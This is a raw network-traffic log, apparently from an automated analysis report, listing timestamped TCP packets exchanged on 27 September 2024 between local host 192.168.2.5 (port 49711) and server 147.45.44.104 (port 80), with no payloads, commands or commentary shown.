Sep 27, 2024 00:15:16.306229115 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306245089 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306261063 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306267023 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306288004 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306446075 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306462049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306477070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306489944 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306492090 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306507111 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306520939 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306520939 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306544065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306560993 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306571960 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306602955 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306603909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306621075 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306634903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306644917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306735992 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306816101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306829929 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306844950 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306859970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306864977 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306876898 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306890965 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306890965 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306901932 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306911945 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306915998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306931019 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306946039 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306961060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306967020 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306976080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306989908 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306993961 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306998968 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.307030916 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.348046064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348081112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348098040 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348112106 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348128080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348141909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348148108 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.348157883 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348176003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348191977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348208904 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348220110 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.348226070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348242998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348244905 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.348259926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348265886 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.348279953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.348282099 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.348320007 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353225946 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353250027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353269100 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353281975 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353293896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353313923 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353321075 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353327990 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353357077 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353394985 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353408098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353439093 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353492975 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353503942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353511095 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353516102 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353527069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353557110 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353575945 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353657961 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353671074 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353682995 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353694916 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353703022 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353744030 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353791952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353804111 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353815079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353826046 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.353841066 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353872061 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.353992939 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354005098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354016066 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354027033 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354038000 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354049921 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354059935 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.354060888 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354072094 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354078054 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354088068 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.354089022 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354101896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354110003 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.354137897 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.354254961 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354266882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354279041 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.354296923 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.354325056 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.392400980 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392415047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392426014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392437935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392529964 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.392564058 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.392564058 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392579079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392592907 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392604113 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392616034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392628908 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392631054 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.392642021 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392653942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392668009 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392668009 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.392685890 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.392700911 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.392731905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.392817974 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393117905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393130064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393150091 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393161058 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393170118 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393172026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393183947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393199921 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393201113 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393219948 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393321991 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393332958 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393345118 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393356085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393364906 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393371105 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393383980 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393393040 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393423080 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393477917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393490076 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393501043 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393521070 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393554926 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393637896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393651009 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393662930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393680096 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393692970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393707991 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393734932 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393759012 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393770933 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393781900 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393793106 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393805027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393809080 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393819094 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.393821001 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.393846035 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394407988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394426107 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394438982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394448996 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394460917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394464970 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394473076 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394480944 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394500971 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394520044 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394638062 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394649982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394660950 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394673109 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394684076 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394690990 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394696951 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394707918 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394711971 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394725084 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394746065 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394773006 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394800901 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394813061 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394824028 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394834995 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.394855022 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394885063 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.394892931 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.436960936 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.449876070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.449898005 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.449914932 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.449984074 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.449987888 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450006962 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450022936 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450035095 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.450041056 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450057983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450082064 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.450103045 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.450270891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450287104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450303078 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450337887 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.450443029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450459957 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450500011 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.450526953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.450906038 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451462030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451478004 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451494932 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451527119 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451590061 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451606989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451626062 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451632977 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451642036 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451667070 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451695919 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451713085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451726913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451739073 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451741934 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451751947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451777935 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451791048 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451808929 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451834917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451850891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451865911 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451877117 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451889992 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451905012 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451905966 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451922894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451936960 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451940060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451956987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.451972961 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.451975107 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452016115 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.452023029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452037096 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452059984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452075958 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.452083111 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452097893 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452112913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452127934 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452146053 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452157974 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.452159882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452179909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452193975 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452205896 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.452210903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452229023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452236891 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.452246904 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452255011 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.452290058 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.452322006 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452464104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.452516079 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.479073048 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479109049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479123116 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479146957 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479162931 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479176998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479193926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479279041 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479295015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479312897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479326963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479330063 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.479336977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479370117 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.479414940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479491949 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479500055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479773045 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479788065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479808092 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479825020 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479840994 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479856968 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479918003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479938030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479954958 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.479995966 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480011940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480026960 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480041981 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480057955 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480153084 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480168104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480184078 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480199099 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480217934 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480318069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480333090 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480348110 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480364084 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480381012 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480396986 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480412960 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480427980 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480443954 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480459929 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480559111 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.480566978 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480595112 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.480638027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480652094 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.480690002 CEST	49711	80	192.168.2.5	147.45.44.104
